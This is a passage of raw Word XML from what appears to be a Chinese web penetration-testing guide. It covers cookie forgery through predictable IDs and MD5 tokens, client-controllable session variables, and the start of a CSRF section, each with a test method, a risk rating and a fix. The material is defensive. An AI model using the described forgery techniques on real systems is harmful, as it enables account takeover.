          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以对</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的属性进行逆向分析，当</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的唯一标识</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和时间戳可预测（如</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用顺序增加方式，</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值是用户名的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）时，攻击者可通过遍历唯一标识</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、猜测</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>手段构造</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来模拟一个有效的用户登录系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9D2936"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7742B14A" w14:textId="5729280F" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00F07001" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，成功进入业务系统或获取用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EC304" w14:textId="77777777" w:rsidR="005064F4"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E4D4B3" w14:textId="23C265D7" w:rsidR="005064F4" w:rsidRPr="007824EA" w:rsidRDefault="005064F4" w:rsidP="007824EA">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器端在</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时在</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值后面加上一段防篡改的验证串，然后再发送到客户端，客户端得到的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>形如：</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>user_name=admin|ab95ef23cc6daecc475de</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分割的后面部分是防篡改验证串，可以使用以下方式生成：</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SHA1</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥）、</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DES</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥）、</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥），密钥是保存在服务器端的固定字符串，应妥善保管。服务器接收到</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，根据</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容和密钥重新计算防篡改验证串，然后和客户端提交的防篡改验证串比较，若两者一致则认为</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEC5113" w14:textId="2A413207" w:rsidR="00B00111" w:rsidRDefault="005064F4" w:rsidP="007824EA">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若使用了</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebSphere</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件，通过配置</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LTPA</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证方式可防止</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F645A2" w14:textId="388CDBA7" w:rsidR="00EF7E10" w:rsidRPr="007824EA" w:rsidRDefault="00EF7E10" w:rsidP="00EF7E10">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14BC5FE" w14:textId="1D9F4223" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="006B2341" w:rsidP="007824EA">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="200" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc498434549"/>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话变量可控</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="15F3D5FE" w14:textId="13D80B1E"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="005219B8" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话中的参数可由客户端控制，导致客户端可以控制并修改会话参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD0BDE" w14:textId="14739D6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测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="009E5544" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidR="009E5544" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="009E5544" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，</w:t>
      </w:r>
      <w:r w:rsidR="00346D49" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析会话中的可控参数并修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D964D4" w14:textId="03D817C8" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00C24790" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="006B2341" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00346D49" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过篡改会话变量，达到欺骗服务器的目的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FDD57C"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF3BFEE" w14:textId="6B909881" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00351AA7" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：会话中存在字段是由可控参数生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937EB53" w14:textId="51463CA7" w:rsidR="006B2341" w:rsidRDefault="006B2341" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00CE5475" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止从客户端传入会话变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED36878" w14:textId="3F009125" w:rsidR="00EF7E10" w:rsidRPr="007824EA" w:rsidRDefault="00EF7E10" w:rsidP="007824E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6CA9A4E" w14:textId="45C5077A" w:rsidR="006B2341" w:rsidRPr="00F757E4" w:rsidRDefault="006B2341" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc498434550"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站请求伪造（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="018A3236" w14:textId="6926A11D"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨站请求伪造攻击，</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），攻击者在用户浏览网页时，利用页面元素（例如</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），强迫受害者的浏览器向</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用服务器发送一个改变用户信息的</w:t>
      </w:r>
      <w:r w:rsidR="001260C5" w:rsidRPr="007824EA">
        <w:rPr>
